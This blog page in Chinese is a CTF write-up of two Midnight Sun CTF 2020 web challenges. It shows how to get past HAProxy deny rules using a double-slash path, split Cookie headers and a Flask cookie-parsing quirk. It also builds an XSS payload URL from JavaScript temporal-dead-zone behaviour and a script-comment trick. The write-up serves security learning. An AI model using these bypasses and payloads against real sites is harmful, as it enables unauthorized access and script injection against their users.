<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    
    <title>Midnight SUN CTF 2020  Write up | Xiao Leung&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    
      <link rel="icon" href="/favicon.png">
    

    <link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="/js/google-code-prettify/tomorrow-night-eighties.min.css">

  </head>

  <body>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>
<header>
	<a id="logo" href="/" title="Xiao Leung&#39;s Blog">
	<img src="/favicon.png" alt="Xiao Leung&#39;s Blog"></a>
	
	
		<!--搜索栏-->
		<i class="js-toggle-search iconfont icon-search"></i>


<form class="js-search search-form search-form--modal" method="get" action="http://gushi.li" role="search">
	<div class="search-form__inner">
		<div>
			<i class="iconfont icon-search"></i>
			<input class="text-input" placeholder="Enter Key..." type="search">
		</div>
	</div>
</form>
	

	
		<!--侧边导航栏-->
		<a id="nav-toggle" href="#"><span></span></a>

<nav>
	<div class="menu-top-container">
		<ul id="menu-top" class="menu">
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/2019/08/01/HelloWorld/" target="_blank">AboutMe</a>
				</li>
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/HXCTF/" target="_blank">HXCTF</a>
				</li>
			
		</ul>
	</div>
</nav>
	

</header>
<div class="m-header ">
	<section id="hero1" class="hero">
		<div class="inner">
		</div>
	</section>
	
		<figure class="top-image" data-enable=true></figure>
	
</div>

<!--文章列表-->
<div class="wrapper">
  
    <!--文章-->
<article>
	
  
    <h1 class="post-title" itemprop="name">
      Midnight SUN CTF 2020  Write up
    </h1>
  

	<div class='post-body mb'>
		<h1 id="Midnight-SUN-CTF-2020-Write-up"><a href="#Midnight-SUN-CTF-2020-Write-up" class="headerlink" title="Midnight SUN CTF 2020  Write up"></a>Midnight SUN CTF 2020  Write up</h1><h2 id="harproxy"><a href="#harproxy" class="headerlink" title="harproxy"></a>harproxy</h2><p>题目一开始就给出了<code>harproxy</code>的配置文件：</p>
<pre><code>global
  daemon
  log 127.0.0.1 local0 debug

defaults
  log               global
  retries           3
  maxconn           2000
  timeout connect   5s
  timeout client    50s
  timeout server    50s

resolvers docker_resolver
  nameserver dns 127.0.0.11:53

frontend internal_access
  bind 127.0.0.1:8080
  mode http
  use_backend test

frontend internet_access
  bind *:80
  errorfile 403 /etc/haproxy/errorfiles/403custom.http
  http-response set-header Server Server
  http-request deny if METH_POST
  http-request deny if { path_beg /admin }
  http-request deny if { cook(IMPERSONATE) -m found }
  http-request deny if { hdr_len(Cookie) gt 69 }
  mode http
  use_backend test

backend test
  balance roundrobin
  mode http
  server flaskapp app:8282 resolvers docker_resolver resolve-prefer ipv4
</code></pre><h3 id="harproxy配置"><a href="#harproxy配置" class="headerlink" title="harproxy配置"></a>harproxy配置</h3><p>可以看到有四个核心的设置：</p>
<pre><code>  http-request deny if { path_beg /admin }
  http-request deny if { cook(IMPERSONATE) -m found }
  http-request deny if { hdr_len(Cookie) gt 69 }
  .........
  server flaskapp app:8282 resolvers docker_resolver resolve-prefer ipv4</code></pre><ul>
<li>拒绝url路径为/admin开头</li>
<li>拒绝cookie不是IMPERSONATE开头</li>
<li>拒绝长度大于69的cookie</li>
<li>这是一个flask应用</li>
</ul>
<h3 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h3><ul>
<li>bypass<code>http-request deny if { path_beg /admin }</code>直接使用用<code>//admin</code>进行绕过，但是在测试中发现GET方式仍然不行，最后在其他大佬的wp中看到使用的是HEAD进行发送。最后会出来cookie:</li>
</ul>
<p><img src="https://cdn.redmango.top/img/20200405214255.png" alt="img"></p>
<ul>
<li>传输cookies时候还有个小trick，<code>http1.1</code>是允许cookie分段传输的所以</li>
</ul>
<pre><code>Cookie: KEY=0be40039bcd8286eab237f481641b16e5e3ab442e0bc1135f08c143b22dc1efc;
Cookie: IMPERSONATE=admin</code></pre><ul>
<li>但是传入正则后仍然无法getflag</li>
</ul>
<p><img src="https://cdn.redmango.top/img/20200405214602.png" alt="img"></p>
<ul>
<li>这里就和flask和haproxy解析cookies的结果不一样导致bypass.看wp是使用进行绕过</li>
</ul>
<blockquote>
<pre><code>;=IMPERSONATE=admin</code></pre></blockquote>
<ul>
<li>我们直接看flask的request的cookie方法：</li>
</ul>
<pre><code class="python">_cookie_re = re.compile(
    br&quot;&quot;&quot;
    (?P&lt;key&gt;[^=;]+)
    (?:\s*=\s*
        (?P&lt;val&gt;
            &quot;(?:[^\\&quot;]|\\.)*&quot; |
             (?:.*?)
        )
    )?
    \s*;
&quot;&quot;&quot;,
    flags=re.VERBOSE,
)</code></pre>
<ul>
<li>我们传入<code>;=IMPERSONATE=admin</code>发现cookie直接被解析了。</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20200407/15862420918417.png" alt="img"></p>
<h2 id="Crossintheroof"><a href="#Crossintheroof" class="headerlink" title="Crossintheroof"></a>Crossintheroof</h2><h3 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h3><pre><code class="php+HTML">&lt;?php
 header(&#39;X-XSS-Protection: 0&#39;);
 header(&#39;X-Frame-Options: deny&#39;);
 header(&#39;X-Content-Type-Options: nosniff&#39;);
 header(&#39;Content-Type: text/html; charset=UTF-8&#39;);

if(!isset($_GET[&#39;xss&#39;])){
    if(isset($_GET[&#39;error&#39;])){
        die(&#39;stop haking me!!!&#39;);
    }

    if(isset($_GET[&#39;source&#39;])){
        highlight_file(&#39;index.php&#39;);
        die();
    }

    die(&#39;unluky&#39;);
}

 $xss = $_GET[&#39;xss&#39;]?$_GET[&#39;xss&#39;]:&quot;&quot;;
 $xss = preg_replace(&quot;|[}/{]|&quot;, &quot;&quot;, $xss);

?&gt;
&lt;script&gt;
setTimeout(function(){
    try{
        return location = &#39;/?i_said_no_xss_4_u_:)&#39;;
        nodice=&lt;?php echo $xss; ?&gt;;
    }catch(err){
        return location = &#39;/?error=&#39;+&lt;?php echo $xss; ?&gt;;
    }
    },500);
&lt;/script&gt;
&lt;script&gt;
/* 
    payload: &lt;?php echo $xss ?&gt;

*/
&lt;/script&gt;
&lt;body onload=&#39;location=&quot;/?no_xss_4_u_:)&quot;&#39;&gt;hi. bye.&lt;/body&gt;</code></pre>
<h3 id="暂存死区"><a href="#暂存死区" class="headerlink" title="暂存死区"></a>暂存死区</h3><ul>
<li><p><code>&lt;!-- &lt;srcpit&gt;</code></p>
</li>
<li><p>这在<a href="https://html.spec.whatwg.org/multipage/scripting.html#restrictions-for-contents-of-script-elements" target="_blank" rel="noopener">HTML</a>标准中有提及</p>
</li>
</ul>
<pre><code class="html">&lt;script&gt;
    var example = &#39;Consider this string: &lt;!-- &lt;script&gt;&#39;;
    console.log(example);
  &lt;/script&gt;
&lt;body&gt;hi. bye.&lt;/body&gt;</code></pre>
<ul>
<li>在js代码中加入<code>&lt;!-- &lt;srcpit&gt;</code>会发生什么呢，可以观察到,<code>&lt;body&gt;</code>被当做js代码并入上一级的<code>&lt;srcpit&gt;</code>标签中。</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20200407/158624379728.png" alt="img"></p>
<ul>
<li>回到上面题目：<pre><code class="html">&lt;script&gt;
setTimeout(function(){
  try{
      return location = &#39;/?i_said_no_xss_4_u_:)&#39;;
      nodice=&lt;?php echo $xss; ?&gt;;
  }catch(err){
      return location = &#39;/?error=&#39;+&lt;?php echo $xss; ?&gt;;
  }
  },500);
&lt;/script&gt;
&lt;script&gt;
/* 
  payload: &lt;?php echo $xss ?&gt;
</code></pre>
</li>
</ul>
<p>*/<br></p>
<body onload="location="/?no_xss_4_u_:)"">hi. bye.<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
```

<ul>
<li>我们要直接bypass最后的那个<code>&lt;body&gt;</code>就可以在$xss中传入一个<code>&lt;!-- &lt;srcpit&gt;</code></li>
<li>那么如何输出构造xss这里？</li>
<li>这里第一个return肯定是不能让他执行的，否则他就会直接跳转。我们先来看一段代码。</li>
</ul>
<pre><code class="javascript">function foo() {
    try{
        return x = &#39;x&#39;;
        let x=1;

    }catch(err){
        return alert(1);
    }}
foo();</code></pre>
<ul>
<li>执行会发现弹框。这是为什么呢，前面我们说过let和var的区别，正因为let不能设置已经声明过的变量导致<code>try</code>中出错，跳转到<code>catch(err)</code>中执行了<code>alert</code>,但是为什么第一个return没有被执行跳转呢？</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20200407/15862463309057.png" alt="img"></p>
<ul>
<li>难道是因为只要在代码块中出现错误就会跳转到<code>catch(err)</code>中，那么我们把代码改成</li>
</ul>
<pre><code class="javascript">function foo() {
    try{
        return x = &#39;x&#39;;
        print(s);

    }catch(err){
        return alert(1);
    }}
foo();</code></pre>
<ul>
<li>可以看到这次直接返回了x,并没有执行<code>catch(err)</code>内容。可以猜测这个和<code>let</code>有关。</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20200407/15862469661040.png" alt="img"></p>
<ul>
<li>我们再把<code>let</code>换成<code>const</code>呢？可以发现<code>alert</code>被执行了。那么我们可以知道<code>let</code>和<code>const</code>有一个共同的特点那就是<code>暂存死区</code>,因为let声明不会被提升到当前执行上下文的顶部。该变量属于从块开始到初始化处理的“暂存死区”。也就是说第一个<code>return</code>到<code>let</code>之间都是暂存死区,可以简单理解为<code>let</code>和<code>const</code>要先执行</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20200407/15862475313345.png" alt="img"></p>
<ul>
<li>在mozilla就有这么一个例子（<a href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Statements/let" target="_blank" rel="noopener">直通车</a>），所以导致xss被执行。</li>
</ul>
<p><img src="C:%5CUsers%5C51763%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200407162507468.png" alt="image-20200407162507468"></p>
<h3 id="exp-综上所述"><a href="#exp-综上所述" class="headerlink" title="exp 综上所述"></a>exp 综上所述</h3><pre><code class="http">http://127.0.0.1/xss.php?xss=alert(1);let%20location=1;%0a%3C!--%3Cscript</code></pre>

	</div>
	<div class="meta split">
		
			<span>本文总阅读量 <span id="busuanzi_value_page_pv"></span> 次</span>
		
		<time class="post-date" datetime="2020-04-07T08:44:05.732Z" itemprop="datePublished">2020-04-07</time>
	</div>
</article>

<!--评论-->

	
<div class="ds-thread" data-thread-key="Midnight SUN CTF 2020  Write up" data-title="Midnight SUN CTF 2020  Write up" data-url="http://www.plasf.cn/2020/04/07/Midnight SUN CTF 2020  Write up/"></div>
<script type="text/javascript">

var duoshuoQuery = {short_name:"yumemor"};
	(function() {
		var ds = document.createElement('script');
		ds.type = 'text/javascript';ds.async = true;
		ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
		ds.charset = 'UTF-8';
		(document.getElementsByTagName('head')[0]
		 || document.getElementsByTagName('body')[0]).appendChild(ds);
	})();
</script>


  
</div>


  <svg id="bigTriangleColor" width="100%" height="40" viewBox="0 0 100 102" preserveAspectRatio="none">
    <path d="M0 0 L50 100 L100 0 Z"></path>
  </svg>

  


  <div class="wrapper"></div>





<div class="fat-footer">
	<div class="wrapper">
		<div class="layout layout--center">
			<div class="layout__item palm-mb">
				<div class="media">
					<img class="headimg" src='/assets/blogImg/litten.png' alt='XiaoLeung'>
					<div class="media__body">
						<h4>兵至如归-Xiaoleung&#39;s Blog</h4>
						<p class='site-description'>Don&#39;t forget why we started</p>
					</div>
				</div>
				<div class="author-contact">
					<ul>
						
							
							<li>
				        		<a href="https://github.com/sharpleung" target="_blank">
				        			
				        				<i class="iconfont icon-github"></i>
				        			
				        		</a>
				        	</li>
						
					</ul>
				</div>
			</div>
		</div>
	</div>
</div>

<footer class="footer" role="contentinfo">
	<div class="wrapper wrapper--wide split split--responsive">
<a href="http://beian.miit.gov.cn/">粤ICP备18132442号-1</a><br>
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="http://beian.gov.cn/img/ghs.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">粤公网安备 44011202000643号</p></a><br>

		
			<span>本站总访问量 <span id="busuanzi_value_site_pv"></span> 次, 访客数 <span id="busuanzi_value_site_uv"></span> 人次</span>
		
		<span>Theme by <a href="http://github.com/justpsvm">justpsvm</a>. Powered by <a href="http://hexo.io">Hexo</a></span>
	</div>
</footer>

	<!-－这里导入了 lib.js 里面涵盖了 jQuery 等框架 所以注释掉-->
	<!--<script src="http://lib.sinaapp.com/js/jquery/2.0/jquery.min.js"></script>-->
	<script src="/js/lib.js"></script>
	<script src="/js/google-code-prettify/prettify.js"></script>
	<script src="/js/module.js"></script>
	<script src="/js/script.js"></script>
	
		<script async src="http://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	
	<script type='text/javascript'>
		//代码高亮
		$(document).ready(function(){
	 		$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
   			prettyPrint();
		});
	</script>
	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
 <script type="text/javascript"> /* 鼠标点击特效 - 7Core.CN */ var a_idx = 0;jQuery(document).ready(function($) {$("body").click(function(e) {var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善");var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length;var x = e.pageX,y = e.pageY;$i.css({"z-index": 100000000,"top": y - 20,"left": x,"position": "absolute","font-weight": "bold","color": "#ff6651"});$("body").append($i);$i.animate({"top": y - 180,"opacity": 0},1500,function() {$i.remove();});});}); </script>

